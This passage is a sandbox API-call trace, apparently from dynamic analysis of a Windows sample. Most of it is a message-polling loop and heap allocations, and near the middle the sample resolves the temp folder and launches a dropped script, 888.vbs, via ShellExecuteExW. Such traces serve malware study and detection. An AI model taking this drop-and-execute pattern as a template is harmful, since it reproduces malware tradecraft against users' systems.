lpMsg=0x8bf7a0) returned 0 [0144.035] Sleep (dwMilliseconds=0xa) [0144.051] timeGetTime () returned 0x2f42d [0144.051] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.051] Sleep (dwMilliseconds=0xa) [0144.066] timeGetTime () returned 0x2f43d [0144.066] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.066] Sleep (dwMilliseconds=0xa) [0144.082] timeGetTime () returned 0x2f44c [0144.082] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.082] Sleep (dwMilliseconds=0xa) [0144.098] timeGetTime () returned 0x2f45c [0144.098] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.098] Sleep (dwMilliseconds=0xa) [0144.114] timeGetTime () returned 0x2f46b [0144.114] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.114] Sleep (dwMilliseconds=0xa) [0144.129] timeGetTime () returned 0x2f47b [0144.129] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.129] Sleep (dwMilliseconds=0xa) [0144.144] timeGetTime () returned 0x2f48b [0144.144] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.144] Sleep (dwMilliseconds=0xa) [0144.161] timeGetTime () returned 0x2f49a [0144.161] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.161] Sleep (dwMilliseconds=0xa) [0144.176] timeGetTime () returned 0x2f4aa [0144.176] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0144.176] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0144.176] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0144.176] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0144.176] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0144.176] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.176] Sleep (dwMilliseconds=0xa) [0144.191] timeGetTime () returned 0x2f4b9 [0144.191] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.191] Sleep (dwMilliseconds=0xa) [0144.207] timeGetTime () returned 0x2f4c9 [0144.207] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.207] Sleep (dwMilliseconds=0xa) [0144.222] timeGetTime () returned 0x2f4d9 [0144.222] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.222] Sleep (dwMilliseconds=0xa) [0144.238] timeGetTime () returned 0x2f4e8 [0144.238] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.238] Sleep (dwMilliseconds=0xa) [0144.253] timeGetTime () returned 0x2f4f8 [0144.254] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.254] Sleep (dwMilliseconds=0xa) [0144.269] timeGetTime () returned 0x2f507 [0144.269] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.269] Sleep (dwMilliseconds=0xa) [0144.285] timeGetTime () returned 0x2f517 [0144.285] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.285] Sleep (dwMilliseconds=0xa) [0144.300] timeGetTime () returned 0x2f527 [0144.301] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.301] Sleep (dwMilliseconds=0xa) [0144.322] timeGetTime () returned 0x2f536 [0144.322] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.322] Sleep (dwMilliseconds=0xa) [0144.332] timeGetTime () returned 0x2f546 [0144.332] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.332] Sleep (dwMilliseconds=0xa) [0144.347] timeGetTime () returned 0x2f555 [0144.347] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.347] Sleep (dwMilliseconds=0xa) [0144.363] timeGetTime () returned 0x2f565 [0144.363] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.363] Sleep (dwMilliseconds=0xa) [0144.378] timeGetTime () returned 0x2f575 [0144.378] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.378] Sleep (dwMilliseconds=0xa) [0144.394] timeGetTime () returned 0x2f584 [0144.394] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.394] Sleep (dwMilliseconds=0xa) [0144.410] timeGetTime () returned 0x2f594 [0144.410] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.410] Sleep (dwMilliseconds=0xa) [0144.425] timeGetTime () returned 0x2f5a3 [0144.425] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.425] Sleep (dwMilliseconds=0xa) [0144.441] timeGetTime () returned 0x2f5b3 [0144.441] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.441] Sleep (dwMilliseconds=0xa) [0144.456] timeGetTime () returned 0x2f5c3 [0144.456] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.456] Sleep (dwMilliseconds=0xa) [0144.476] timeGetTime () returned 0x2f5d2 [0144.476] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.476] Sleep (dwMilliseconds=0xa) [0144.490] timeGetTime () returned 0x2f5e2 [0144.490] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.490] Sleep (dwMilliseconds=0xa) [0144.503] timeGetTime () returned 0x2f5f1 [0144.503] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.503] Sleep (dwMilliseconds=0xa) [0144.519] timeGetTime () returned 0x2f601 [0144.519] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.519] Sleep (dwMilliseconds=0xa) [0144.534] timeGetTime () returned 0x2f611 [0144.534] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.535] Sleep (dwMilliseconds=0xa) [0144.550] timeGetTime () returned 0x2f620 [0144.550] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.550] Sleep (dwMilliseconds=0xa) [0144.566] timeGetTime () returned 0x2f630 [0144.566] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.566] Sleep (dwMilliseconds=0xa) [0144.581] timeGetTime () returned 0x2f63f [0144.581] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.581] Sleep (dwMilliseconds=0xa) [0144.597] timeGetTime () returned 0x2f64f [0144.597] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.597] Sleep (dwMilliseconds=0xa) [0144.612] timeGetTime () returned 0x2f65f [0144.612] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.612] Sleep (dwMilliseconds=0xa) [0144.628] timeGetTime () returned 0x2f66e [0144.628] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.628] Sleep (dwMilliseconds=0xa) [0144.644] timeGetTime () returned 0x2f67e [0144.644] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.644] Sleep (dwMilliseconds=0xa) [0144.659] timeGetTime () returned 0x2f68d [0144.659] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.659] Sleep (dwMilliseconds=0xa) [0144.675] timeGetTime () returned 0x2f69d [0144.675] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.675] Sleep (dwMilliseconds=0xa) [0144.691] timeGetTime () returned 0x2f6ad [0144.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0144.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0144.691] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0144.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0144.691] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a90f0 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9138 [0144.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8d90 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0144.691] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0144.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9138 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0144.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0144.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0144.692] ShellExecuteExW (in: pExecInfo=0x8bf834*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x8bf834*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x22c)) returned 1 [0145.287] CloseHandle (hObject=0x22c) returned 1 [0145.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0145.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0145.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0145.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0145.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0145.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0145.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0145.288] CharUpperBuffW (in: lpsz="A0110005C00", cchLength=0xb | out: lpsz="A0110005C00") returned 0xb [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0145.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0145.288] CharUpperBuffW (in: lpsz="A2B10104C1C", cchLength=0xb | out: lpsz="A2B10104C1C") returned 0xb [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0145.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0145.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.289] CharUpperBuffW (in: lpsz="SSA2B10104C1C", cchLength=0xd | out: lpsz="SSA2B10104C1C") returned 0xd [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0145.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0145.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0145.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6b0 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0145.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af750 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0145.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af778 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1048 [0145.290] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af778 | out: hHeap=0x25c0000) returned 1 [0145.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1048 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0145.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0145.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a90f0 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af778 [0145.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9138 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0145.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9138 | out: hHeap=0x25c0000) returned 1 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9138 [0145.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 